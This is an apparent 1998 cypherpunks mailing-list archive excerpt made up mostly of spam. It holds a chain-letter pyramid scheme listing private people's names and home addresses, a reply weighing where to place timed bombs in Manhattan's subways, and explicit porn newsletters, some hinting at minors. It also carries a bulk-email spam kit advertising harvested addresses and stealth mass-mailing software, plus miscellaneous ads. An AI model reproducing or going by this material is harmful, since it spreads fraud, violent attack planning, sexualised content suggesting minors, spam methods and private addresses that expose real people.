in each of the 5 envelopes and seal them. You should now have 5 sealed
envelopes, each with a piece of paper stating the above phrase and a $1.00
bill. What you are doing is creating a service by this. THIS IS PERFECTLY
LEGAL!            

Mail the 5 envelopes to the following addresses:


#1      Corey McNear
        233 Olive st.  
        West Reading, PA 19611    
 
#2      R. M.
        66 Navesink Drive
        Monmouth Beach, NJ  07750     

#3      Sam    
        27248 Grano Avenue
        Saugus, CA 91350

#4      Pat anderson
        41 pilote
        st-ambroise Pq

#5	Nick Austin
	12318 Dollar Lk dr
	Fenton, MI 48430-9734

STEP 2: Now take the #1 name off the list that you see above, move the
other names up (2 becomes 1, 3 becomes 2, etc...) and add YOUR Name as
number 5 on the list.

STEP 3: Change anything you need to, but try to keep this article as
close to original as possible. Now, post your amended article to at
least 200 newsgroups. (I think there is close to 18,000 groups) All
you need is 200, but remember, the more you post, the more money you
make!
    
Don't know HOW to post in the newsgroups? Well do exactly the
following: 

FOR NETSCAPE USERS:     
1) Click on any newsgroup, like normal. Then click on "To News", which
is in the top left corner of the newsgroup page. This will bring up a
message box.     

2) Fill in the SUBJECT with a flashy title, like the one I used,
something to catch the eye!!!

3) Now go to the message part of the box and retype this letter     
exactly as it is here, with exception of your few changes. (remember
to add your name to number 5 and move the rest up)
6

4) When your done typing in the WHOLE letter, click on 'FILE' above
the send button. Then, 'SAVE AS..' DO NOT SEND YOUR ARTICLE UNTILL YOU
SAVE IT. (so you don't have toype this 200 times :-)     

5) Now that you have saved the letter, go ahead and send your first
copy! (click the 'SEND' button in the top left corner)    

6) This is where you post all 200! OK, go to ANY newsgroup article and
click the 'TO NEWS' button again. Type in your flashy subject in the
'SUBJECT BOX', then go to the message and place your cursor here. Now 
click on 'ATTACHMENT' which is right below the 'SUBJECT BOX'. Click on
attach file then find your letter wherever you saved it.  Click once
on your file then click 'OPEN' then click 'OK'.  If you did this right
, you should see your filename in the 'ATTACHMENT BOX' and it will be
shaded.   

NOW POST AWAY!   

FOR INTERNET EXPLORER:     
It's just as easy, holding down the left mouse button, highlight this
entire article, then press the 'CTRL' key and 'C' key at the same time
to copy this article. Then print the article for your records to have 
the names of those you will be sending $1.00 to.   

Go to the newsgroups and press 'POST AN ARTICLE' type in your flashy
subject and click the large window below. Press 'CTRL' and 'V' and the
article will appear in the message window. **BE SURE TO MAKE YOUR
ADDRESS CHANGES TO THE 5 NAMES.** Now re-highlight the article and 
re-copy it so you have the changes.... then all you have to do for  
each newsgroup is 'CTRL' and 'V' and press 'POST'. It's that easy!!  
THAT'S IT! All you have to do is jump to different newsgroups and post
away, after you get the hang of it, it will take about 30 seconds for
each newsgroup!   

**REMEMBER, THE MORE NEWSGROUPS YOU POST IN, THE MORE MONEY YOU WILL
MAKE!! BUT YOU HAVE TO POST A MINIMUM OF 200**

**If these instructions are too complex to follow, try Forte's "Free
Agent." It is freeware for noncommercial use. To download it, simply
use a search utility and type "Forte Free Agent". You should be able 
to find it.**   

That's it! You will begin receiving money from around the world within
days! You may eventually want to rent a P.O. Box due to the large
amount of mail you receive. If you wish to stay anonymous, you can  
invent a name to use, as long as the postman will deliver it. **JUST  
MAKE SURE ALL THE ADDRESSES ARE CORRECT.** 

Now the WHY part: 

This entire principle works because it is in a format of an upside    
down tree with thousands of branches. Everyone below you will see to
it that the tree continues because they want to get money. Those
below THEM will continue because THEY want to get the cash etc.

Out of 200 postings, say I receive only 5 replies (a very low
example). So then I made $5.00 with my name at #5 on the letter. Now,
each of the 5 persons who just sent me $1.00 make the MINIMUM 200   
postings, each with my name at #4 and only 5 persons respond to each
of the original 5, that is another $25.00 for me, now those 25 each 
make 200 MINIMUM posts with my name at #3 and only 5 replies each, I
will bring in an additional $125.00! Now, those 125 persons turn
around and post the MINIMUM 200 with my name at #2 and only receive 5 
replies each, I will make an additional $626.00! OK, now here is the
fun part, each of those 625 persons post a MINIMUM of 200 letters 
with my name at #1 and they each only receive 5 replies, that just  
made me $3,125.00!!! With a original investment of only $5.00!
AMAZING! And as I said 5 responses is actually VERY LOW!  Average is
probable 20 to 30! So lets put those figures at just 15 responses
per person. Here is what you will make:

at #5 $15.00   
at #4 $225.00    
at #3 $3,375.00 
at #2 $50,625.00
at #1 $759,375.00    

When your name is no longer on the list, you just take the latest
posting in the newsgroups, and send out another $5.00 to names on the
list, putting your name at number 5 and start posting again. 
The thing to remember is that thousands of people all over the world
are joining the Internet and reading these articles everyday, JUST  
LIKE YOU are now!! And this will go on and on and on and on.... get 
the picture? Well, there's 5,000,000,000 people on the world and 
most of them will eventually end up being hooked into the internet.
So  there are virtually unlimited resources. Of course this will work
the best at the very beginning so the faster you post, the better for
YOU!     

People have said, "what if the plan is played out and no one
sends you the money? So what! What are the chances of that happening
when there are tons of new honest users and new honest people who are
joining the Internet and newsgroups everyday and are willing to
give it a try? Estimates are at 20,000 to 50,000 new users,
every day, with thousands of those joining the actual Internet.
Remember, play FAIRLY and HONESTLY and this will work. You just have
to be honest.  Make sure you print this article out RIGHT NOW, also.
Try to keep a list of everyone that sends you money and always keep an
eye on the newsgroups to make sure everyone is playing fairly. 

Remember, HONESTY IS THE BEST POLICY. You don't need to cheat the   
basic idea to make the money!!       

GOOD LUCK to all and please play fairly and reap the huge rewards from
this, which is tons of extra CASH. **By the way, if you try to deceive
people by posting the messages with y name in the list and not    
sending the money to the rest of the people already onhe list, you 
will NOT get as much. Someone I talked to knew someone who did that
and he only made about $150.00, and that's after seven or eight weeks!
Then he sent the 5 $1.00 bills, people added him to their lists, and
in 4-5 weeks he had over $10k. This ishe fairest and most honest way
I have ever seen to share the wealth of the world without costing 
anything but our time!!! You also may want to buy mailing and e-mail
lists for future dollars.    

Please remember to declare your extra income.   Thanks once again...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Feb 1998 17:31:02 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <1.5.4.32.19980208003515.00744198@pop.pipeline.com>
Message-ID: <Dg6Jke10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young <jya@pipeline.com> writes:

> Manhattan would be easily blown, remotely. Place a time-charge
> beneath a car at the head each principal subway line (which
> commence in other boroughs), set to blow at the main stations.
>
> For the West Side, supplement with a charge in the PATH train
> from Jersey.
>
> For the East Side, supplement with another in the LI Railroad
> from the Island.

Also Metronorth coming into Grand Central on 42nd st.., But:

Most subways are underground in Manhattan. A device that gives off enough
bang to be felt above ground has to be at least as big as a suitcase. How
likely is a suitcase unaccompanied by a human to go unnoticed on NYC
subway? Not very. Under a bus seat? A little less noticeable.

A smaller timed device would be limited to blowing up or gassing or
incinerating only whoever's on the subway - and the worthy victims
don't take the subway.

I think a parked car (or a car driven by a suicidal driver) is more
likely for delivering a suitcase or larger.

> Forget anything above 86th Street, they'll applaud; like the
> WVA and VA hillfolks will hooray the destruction of see-navel
> DC and its high-pitch babbling wonks.

I object to any terrorist plans that don't include the complete
destruction of Columbia University and the City College too. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 8 Feb 1998 03:44:27 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sun Feb 8 '98
Message-ID: <19980208083853.9584.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Sunday's issue of Eureka!

BLACK LABEL
Get yourself  a FREE two day pass to Black Label!  They have
over 2,000  hardcore movies,  FREE live  fucking -  over 200
with sound,  10,000 hot  sex stories,  Top-quality  hardcore
pictorials, and so much more you'll be amazed. Check it out!
Black Label ---------> http://www.xxx69.com/banner_mail.html 

Playgal - No.1 in Internet Hardcore!
http://www.playgal.com/playgal/banner_eureka.html
Playgal presents FREE LIVE FUCKING, and over 2,000 FREE XXX
MOVIES!

VELVET-LIPS
This is a hot website.  It is also a paysite.  But there are
some great free pix for you to check out before you join up.
Quick loading and thumbnailed for easy access.  These images
are high  resolution  and open in their own frame.  This one
may cause a stir in you pants.   Oh yes, you betcha, uh huh!
Velvet Lips .................... http://www.velvet-lips.com/

ANNA'S ORIGINAL PICTURE GALLERY
Careful, each and every image will toss you to a signup page
but  the ones that  you do see  are impressive.  Super young
girls fucking and sucking and spreading their pussy for you!
Anna's Original Picture ......... http://www.supergirls.com/

SUBLIME
Spanky BDSM pix!  After entering the  site click on, Sublime 
Bondage  Sluts.  Down at the  bottom of the page there are a
few quick loading thumbnailed images of some sweet pain pix!
Sublime ...................... http://sublime.wizardtech.net

AMATEUR SITE
Everyone like a good looking  amateur!  This site delivers a
lot of young ladies.  Quick loading thumbnailed images. Here
you will find some nice looking natural tits, pussy and ass.  
Amateur ........................ http://www.amateursite.com/

#READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
#$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A
#
HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
20vids+Chat -> http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Renee: An amateur  fan's  ultimate  dream!  Renee' possesses
everything you could possibly want  in a woman: head turning
looks, a  beautiful  body,  a  gorgeous  face,  and  a sweet
disposition with a penchant  for  being  nasty!  ( She likes
girls too, and has the photos on  her page to prove it). Her
site is well done and  easy  to  navigate  with TONS of FREE
pictures. Visit Renee' now to visit perfection.
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
HotStories.com: Tired of all  those  pics?  Hot Stories lets
you use your imagination to is full potential. Over 100 free
sex stories in 8 different categories. Our stories are worth
a thousand pics! ................ http://www.hotstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?080
Pic  2 --------------------------> http://137.39.63.229/?081
Pic  3 --------------------------> http://137.39.63.229/?082
Pic  4 --------------------------> http://137.39.63.229/?083
Pic  5 --------------------------> http://137.39.63.229/?084
Pic  6 --------------------------> http://137.39.63.229/?085
Pic  7 --------------------------> http://137.39.63.229/?086
Pic  8 --------------------------> http://137.39.63.229/?087
Pic  9 --------------------------> http://137.39.63.229/?088
Pic 10 --------------------------> http://137.39.63.229/?089

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foupe@compuserve.com
Date: Sun, 8 Feb 1998 09:54:38 -0800 (PST)
To: foupe@compuserve.com
Subject: Young Hot Girls New Site
Message-ID: <199802081631RAA1411@post.120.165.41>
MIME-Version: 1.0
Content-Type: text/plain


>>Young Hot Girls New Site

Can you handle 2 young, hot, sexy girls? Cum watch us at:
http://www.livewhorehouse.com

Where you can complete our menage-a-trois.
We really hate it when you don't cum.


Luv
Nadia and Alexa
XOXOXOXOXOXO




======================================
WE HONOR ALL REMOVE REQUESTS!! JUST MAIL YOUR REQUESTS TO:
jackpotx@ix.netcom.com
======================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Bantelmann <KurtBantelmann@compuserve.com>
Date: Sun, 8 Feb 1998 12:52:48 -0800 (PST)
To: Owner <cypherpunks@toad.com>
Subject: Global Ethics Cosmosofy
Message-ID: <199802081552_MC2-326E-5452@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


To: Cypherpunks, editor.
We are impressed by your social commitment on the Internet and 
think you may find that Global Ethics Cosmosofy would 
even better support your activities and spiritual concerns since 
universal values have precedence over limited group moral codes 
in cases of conflict and its peaceful resolution in a cooperating 
information oriented and interdependent world community. 
The better arguments can be yours free, to be viewed on the 
Cosmosofy Institute Foundation website: 

<http: //www.cosmosofy.org/>

But there is more to it:
(1) Global Ethics and the overall doctrine tentatively termed 
COSMOSOFY (similar to 'globalism') will not only assist you in 
ethics to identify the higher and highest values to which priority 
consideration must be given in each case, in particular where 
a psychological or social conflict has to be resolved rationally 
and peacefully. It also helps to avoid and cure psychic disorders 
most of which are attributable to dogmatic indoctrination methods 
during childhood but which tend to remain unconscious, since 
people usually deny they feel indoctrinated. 

A severe conflict potential for humanity in the present historical 
moment is its more or less unconscious subjugation to outdated 
arbitrary moral precepts and codes imposed and indoctrinated 
during adolescence (where spiritual maturity is low), thus 
obstructing later undogmatic moral and ethical updating flexibility 
and development. However, any change of this unwholesome and 
dangerous situation is considered a political TABOO for social 
and cultic stability reasons and social control in the absence 
of GLOBAL ETHICS and a UNIVERSAL UNDOGMATIC 
RELIGION, although now possible at this historical junction.
Cosmosofy Universal Ethics provides interdisciplinary thinking 
and action patterns, not of the usual type of non-merging 
interdisciplinary exchange programs but of the new type to be 
merged in one's own mind which is now accessible for 
everybody due to interactive feedback information structures. 

(2) COSMOSOFY UNIVERSAL ETHICS
Subject: Interdisciplinary, linking  religion, law, sociology, 
philosophy, politics, sciences.

The so far missing universal ethics is provided by the 
interdisciplinarian author Bert Tellan, founder of COSMOSOFY 
and undogmatic religion (Cyber-Religion) as a doctrine designed to 
constitute the so far missing foundation for the legal 
and religious system's priority values in a peacefully cooperating and 
closely communicating global community. So far mankind was dependent
only on particularistic morals that were mutually exclusive and could 
therefore not be validated universally: of importance for peace, conflict 
resolution competence and qualification, and ecological issues. 

(3) You will find that Global Ethics Cosmosofy & Undogmatic Religion 
has been constructed with the aim to solve dogmatic 'religions' (regarded 
as cults acc. to Kant if used as an end in itself instead of a means)seen 
as a 
social PROBLEM (to be solved instead of being merely studied)  for a 
modern global society and world culture in order to 
avoid continuing antagonism instead of promoting real peace in the sense 
of absolute pacifism. So far nations, cultures or religious organizations 
favored peace conditionally under their own moral terms (excepting the 
need of 'holy' for Islamic or 'just' wars for Christians). This is no
longer 
possible in a world saturated with means of push-button mass destruction. 
In this historical context dogmatic religious cult is  no longer seen as 
an unending study subject for scientifically detached sociologists or 
psychologists of religion (just wondering as William James did at the 
great variety of religions) while making a living from it and get 
research funds - while, on the other end, no church or other educational 
institution ever bothered to even make an attempt of funding the 'further 
development or advancement of religion and of religiousness'. All the while

the Advancement of Science is considered a respectable institution: another

grave cultural inconsistency we have been indoctrinated not to notice. 
To the contrary, all through history any 'further development of religious 
thought' was condemned, persecuted as heretic or apostasy, philosophers 
or reformers (including Jesus) having been murdered to this day. This is 
due to a flawed idea of unchanging 'religion' (=false religion) which is to

be regarded as a problem and not as an endless subject of study or even 
of tolerance while cannibalism and illiteracy are also no longer being 
tolerated, in the very name of an improved, in-depth understanding of 
dynamic religion. 
The solution, thus, does not advocate atheism, non-belief or arbitrary 
values as is wrongly suggested for post-modernism, since, quite to the 
contrary, the arbitrariness of cultural relativistic values is hereby 
overcome having the whole of humanity, individual justice and human 
rights for all in mind, and not for some privileged classes or groups only.

And thus to establish true peace for mankind and be prepared for a new 
era of common cosmic adventure or communication instead of 
continuous strife with the risk of self-extinction.

View the Cosmosofy Institute Foundation Website (featuring around 100 
new articles on unresolved modern and prognosticized issues and the
consistent application of global ethics to their solution in each case): 

<http: //www.cosmosofy.org/>

Cosmosofy Institute Foundation. Kurt C. Bantelmann, editor. More details 
on request. Fax:(49)211.489533. E-mail: 106562.2403@compuserve.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Sun, 8 Feb 1998 22:09:07 -0800 (PST)
Subject: FDA Certified & Registered
Message-ID: <199802090444.WAB01261@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


Exclusive New Oral Transmucosal 
Weight Control Disc & Transdermal
Patch both FDA Certified & Registered
with National Drug Code #'s Developed
by 10yr old Pharmaceutical Company.

For detailed information reply to: bodyperfect@mailrobot.com

To Remove you address from future mailings reply to: Remove@rmjent.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mktmaster23662@juno.com
Date: Mon, 9 Feb 1998 22:04:26 -0800 (PST)
To: Friend@public.com
Subject: HERE IS HOW TO BULK EMAIL...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Press the reply button and type "remove" (without the quotes) in the 
subject heading to be removed from our list.  Thank You
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Here is how to bulk email your product, service,
or business opportunity SUCCESSFULLY...

FACT:
While there are many people who TRY to bulk email,
There are very few who do it successfully!

Why?:
Because many people buy bulk email software along with millions 
of addresses, and are still not supplied with the NECESSARY
INFORMATION they MUST HAVE to successfully bulk email.

Here is the rest of the information that the bulk email programs
and list sellers never give you that you MUST have.

For the beginner:

This site teaches you as if you were in the 1st Grade, with complete step-by-step INSTRUCTIONS, SOFTWARE & addresses
to start effective bulk emailing IMMEDIATELY, at speeds of
up to 250,000 emails per hour (and faster).

Don't pay someone else to send your bulk email...
You never know if it REALLY IS going out!
DO IT YOURSELF!


WE INCLUDE:

* COMPLETE INSTRUCTIONS on HOW to send Bulk Email!
* Information on SMTP servers
* "bulk friendly" ISPs
* How to Make sure your email is being delivered
* How to read header information
* How to put "CLICK HERE" links in your bulk email
* HOW TO SEND BULK EMAIL IN COLOR
* Information on the Internet and WHY bulk emailing
* Much, Much More!

Also:

* FREE 8 MILLION EMAIL ADDRESSES available for download
   RIGHT NOW!
* FREE Email List Management Software (sorts, counts, filters,
   combines, etc. at Lightning Speed!)
* STEALTH MASSMAILER SOFTWARE  When registering
   YOU WILL SAVE 50%!!!!!
* FREE Software demo that AUTOMATICALLY keeps you signed
   on AOL indefinitely!
* Search Engine submission software demo
* MANY MORE SUPRISES AND PROGRAMS!!!!


The cost for membership is only $99.00!!!! Limited Time Offer!

<HTML><PRE>CLICK HERE NOW!</PRE></HTML>

or point your browser to:  http://209.51.216.146/bulk.htm








































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Mon, 9 Feb 1998 01:01:14 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Mon Feb 9 '98
Message-ID: <19980209081732.24447.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Monday's issue of Eureka!

PURE HARDCORE
For a limited time only,  Pure Hardcore is  giving away FREE
3 day memberships!  Unlimited Access to over 250 Channels of
Live  Video!  Unlimited  Access  to over  2000 Hardcore  XXX
Photos!  Unlimited Access  to over  200 Steamy  XXX Stories! 
Unlimited Access to the Live Java Chat Room!  Don't miss it!
Hard City ---> http://www.purehardcore.com/partners/H001.cgi

SINFUL'S 20 FREE XXX PICS
http://www.sinful.net/cgi-bin/topvlog.cgi?eureka
20 FREE HARDCORE, CUMSHOT, GROUPSEX, AND FREE ANALSEX PHOTOS
UPDATED WEEKLY PLUS LINKS TO 700+ FREE ADULT PICTURE SITES.
CATEGORIES INCLUDE: ASIAN, HARDCORE, SOFTCORE, BABES, AND
PIC LINKS. YOU GET ALL OF THIS FOR FREE!! VISIT US NOW!!

SCARLET HARLOT
Hot graphics, hot site. Choose  from  a  wide spread of sex.
Maybe asians,  blondes,  brunettes,  lesbians  or  good  ol'
pumping XXX grabs your  interest.  The  site looks good. The
pix load in  fast.  Get  ready  to  show  your appreciation.
Scarlet Harlot ............ http://www.sexontap.com/scarlet/

THE PUSSY WAGON
Well wagons ho!  An interesting site featuring a curious mix
of high resolution images. There are celebrities, anal asian
coeds and even some amateurs.  Grab your mouse and go there,
you  may  just end  up  with a woody!  Bookmark  the  wagon!
The Pussy Wagon .................... http://www.weg.net/~pw/

WUZFUZZY'S PLACE
We all know the story about fuzzy wuzzy.  Well this web site
features all of the pretty  ladies who have lost their pussy
hair!  Not a pubic hair in the bunch!  Nice and smooth! Yes,
I know that is the way you like it.  Lick some pussy people!
WuzFuzzy's Place .......... http://www.sisnaaz.com/wuzfuzzy/

ANALLY YOURS
Nice clean well  built website.  It delivers the porno,  big
time!  Lots of free pix,  thumbnailed for  your convenience!
Also, a free video or two.  See the photo album for some hot
butt action.  Pussies dripping with  sex juice in a big way!
Anally Yours ....................... http://151.196.204.209/

#READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
#$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A
#
HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Just 18 -----------------------> http://204.244.215.7/teens/

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Angel: Angelsweb is this redhead's  home turf. She's a sweet
looking 19 year old who displays  plenty of close-ups of her
private parts and is proof that blondes aren't the only ones
who have fun! Her  turn  ons  include  soft  lips and a sexy
smile. Her goal is to  become  a  veterinarian - I would let
her check out my chicken any day!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Planet Mojo: Mojo  brings  you  the  juiciest erotic stories
weekly! Every  week  all  new  exciting  erotic  stories are
posted for your pleasure. Visit Mojo today! ................
................................. http://www.planetmojo.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?090
Pic  2 --------------------------> http://137.39.63.229/?091
Pic  3 --------------------------> http://137.39.63.229/?092
Pic  4 --------------------------> http://137.39.63.229/?093
Pic  5 --------------------------> http://137.39.63.229/?094
Pic  6 --------------------------> http://137.39.63.229/?095
Pic  7 --------------------------> http://137.39.63.229/?096
Pic  8 --------------------------> http://137.39.63.229/?097
Pic  9 --------------------------> http://137.39.63.229/?098
Pic 10 --------------------------> http://137.39.63.229/?099

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: yourfriend8950@psynet.net
Date: Mon, 9 Feb 1998 17:13:46 -0800 (PST)
Subject: Online Credit Card Transactions for $39.95!!
Message-ID: <199802100111.BAA03828@server1.online-now.de>
MIME-Version: 1.0
Content-Type: text/plain


Lease to own your merchant account equipment, software, and shopping cart system for only $39.95 per month! WE GUARANTEE APPROVAL no matter what your credit status may be!

The benefits include:

* 2% Discount Rate

* No Monthly Minimum Billing Fee

* No Statement Fee if No Sales Made for the Month

* Money Available in 3 Business Days

* Windows-Based or Macintosh Compatible Credit Card Processing Software (Available)

* Shopping Cart System To Take Orders Securely Right On-Line (Available)

* Checks By Fax/Email/Phone software.  

Please call us at 912-236-6676 for more information.

Please fill out the form below and fax to 970-927-0964.
=======================================================

Merchant Account Application


Legal Business Name: ____ 
State: __________________   
DBA: ____________________              
Business Address: _______ 
Suite: __________________   
City State Zip: _________      
Describe Business: ______     
Business Hours: _________   
Percent Mail Order: _____     
Percent Phone Orders: ___    
Percent Trade Show: _____     
Locations: ______________     
Year Started: ___________     
Fed Tax ID: _____________         
State Tax ID: ___________       
Principal Contact: ______        
Title: __________________            
Phone No: _______________            
Fax No: _________________              
Est Card Sales Month: ___           
Average Ticket: _________           
Type of Business: _______    
State Incorporated: _____         
Age of Business: ________          
Date Acquired: __________         


OWNER PRINCIPAL INFORMATION: 

President Owner: ________ 
Title: __________________          
Ownership: ______________   
Residence Address: ______        
City State Zip: _________       
Own Rent: _______________        
Since: __________________        
Home Phone: _____________        
Previous Address: _______     
DOB: ____________________        


CO OWNER INFORMATION: 

Co-Owner: _______________ 
Title: __________________         
Percent Owned: __________   
Residence Address: ______     
City State Zip: _________     
Since: __________________     
Own Rent: _______________      


BUSINESS TYPE: 

Type of Building: _______ 
Found EMS By: ___________        
CREDIT INFO: 
Rank Your Credit: _______ 
Prior Bankrupt: _________         
Year: ___________________ 


TERMINAL: 

Prefer PC Software or Terminal?: ___ 
Terms/Lease or Purchase?: __________________           


REFERENCES: 

BUSINESS REFERENCES: (Please list three)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Tue, 10 Feb 1998 03:24:16 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Tue Feb 10 '98
Message-ID: <19980210083153.1416.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Tuesday's issue of Eureka!

EROTIC PARADISE
One  of the  largest pay  sites on the web, Erotic Paradise,
has now opened its doors to FREE memberships.  That's right,
you can now get an entire week of hot videos, 1,000s of pix,
and much, much more - and it's complely FREE.  Check it out!
------> http://www.mr-cash.com/cgi-bin/gold.cgi/raw_3266/999

My Sister NAKED! FREE PIX
http://205.134.162.9/sister/
I took pictures of my sister naked!

EATING AT THE "Y"
Creative use of webdesign.  Lots of free pix.  These are not
your  ordinary women.  These are hot  looking babes!  Saddle
on up to the  bar for some real food.  Snack  on a brunette,
dine with a blonde.  Maybe food does mix with sex?  Surf by.
Eating at the Y ... http://207.156.223.181/they/warning.html

DEVIL'S DELIGHT
This is a paysite.  There are three  free pix however.  They
load fast and are high resolution.  One is of a woman taking
on two  large cocks.  Next is a  hot looking blonde.  Pussy!
Devil's Delight .............. http://www.devilsdelight.com/ 
 
PLANET EROTIC
This is  a paysite.  But that is  not a bad thing.  There is 
something you have to see to believe. Click the guest button
and proceed by  clicking on the free pics text links.  After
about four  pages of these links (located at the bottom) you 
will  arrive  at some thumbnails.  On the  second row of pix
third  one to the right,  click that one.  Mysterious labia!
Planet Erotic .................. http://www.planeterotic.com

PORNO MACHINE
Pretty good website!  Decent webdesign  and use of graphics.
They feature  some free  pix as well.  Lots of pussy  filled
to the brim  with cock.  The pix are not  huge but they load
quick.  Oh and there are free videos! This is a busy server.
Porno Machine ................. http://www.pornomachine.com/

READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
